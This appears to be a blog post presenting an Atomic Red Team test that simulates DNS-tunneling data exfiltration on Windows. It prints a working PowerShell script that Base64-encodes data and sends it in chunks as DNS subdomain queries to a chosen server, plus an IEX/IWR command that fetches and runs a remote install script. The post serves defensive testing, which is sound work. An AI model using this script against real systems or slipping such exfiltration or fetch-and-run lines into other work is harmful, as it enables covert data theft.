Enhancing Cyber Defense: Simulating DNS Tunneling for Data Exfiltration

Photo by freestocks on Unsplash

Introduction: In the dynamic landscape of cybersecurity, understanding and mitigating advanced threats is key. DNS tunneling, a method often used for data exfiltration, poses a significant challenge due to its stealthy nature. This blog post introduces an atomic test I’ve developed to simulate this threat, offering a hands-on approach to enhance your cybersecurity defenses.

Understanding DNS Tunneling DNS tunneling involves encoding the data of other programs or protocols in DNS queries and responses. Malicious actors use this method for data exfiltration or establishing command and control (C2) channels, exploiting the fact that DNS is a trusted protocol and often less scrutinized.

The Atomic Test: A Detailed Overview The atomic test, available on the Atomic Red Team repository, is crafted for Windows environments. It simulates DNS tunneling for data exfiltration with the following parameters:

• dns_server: The DNS server's IP or domain name.
• exfiltrated_data: The data to be exfiltrated.
• chunk_size: The size of each DNS query chunk.

Code Integration and Explanation The test leverages PowerShell for execution. Here’s a breakdown of the script:

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}
$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"
foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

This script performs the following actions:

1. Encodes the exfiltrated_data in Base64.
2. Splits this data into chunks.
3. Constructs a DNS query with each chunk as a subdomain of dns_server.
4. Sends these queries at intervals, simulating data exfiltration.

Practical Example Suppose you want to test exfiltrating the string “SecretDataToExfiltrate” to a DNS server at dns.example.com. The script will encode the data, split it into chunks (based on the specified chunk_size), and send each chunk as part of a DNS query.

Importance of This Test This atomic test serves as a crucial tool for cybersecurity professionals to:

• Identify gaps in DNS monitoring and filtering.
• Train teams to detect and respond to DNS tunneling.
• Assess the effectiveness of existing security controls against DNS-based threats.

Implementing the Test To use this test:

1. Download the Atomic Red Team repository.
2. If the execution framework or the atomics folder are already found on disk you must use the -Force parameter during install as follows to erase and replace these folders.

IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics -Force

Run the following command to verify that we have successfully installed the latest repository.

PS C:\Users\sasukeu> Invoke-AtomicTest T1041 -ShowDetails

[********BEGIN TEST*******]
Technique: Exfiltration Over C2 Channel T1041
Atomic Test Name: Text Based Data Exfiltration using DNS subdomains
Atomic Test Number: 2
Atomic Test GUID: c9207f3e-213d-4cc7-ad2a-7697a7237df9
Description: Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}
Command (with inputs):
$dnsServer = "dns.example.com"
$exfiltratedData = "SecretDataToExfiltrate"
$chunkSize = 63

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}
[!!!!!!!!END TEST!!!!!!!]


PS C:\Users\sasukeu>

Customizing Test Parameters You can customize the test parameters (like dns_server, exfiltrated_data, and chunk_size) directly in the command line by adding them after the test number. For example:

Invoke-AtomicTest T1041 -TestNumbers 2 -InputArgs @{ "dns_server"="dns.example.com"; "exfiltrated_data"="SecretDataToExfiltrate"; "chunk_size"=63 }

Conclusion By using the Invoke-AtomicTest command, you can easily run and customize Atomic Red Team tests, such as the DNS Tunneling simulation. This test provides a practical and efficient way to assess and improve your defenses against covert data exfiltration techniques. Remember to execute this test in a controlled environment and review the test's output to understand how your security systems react to such scenarios.

Reference:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md#atomic-test-2---text-based-data-exfiltration-using-dns-subdomains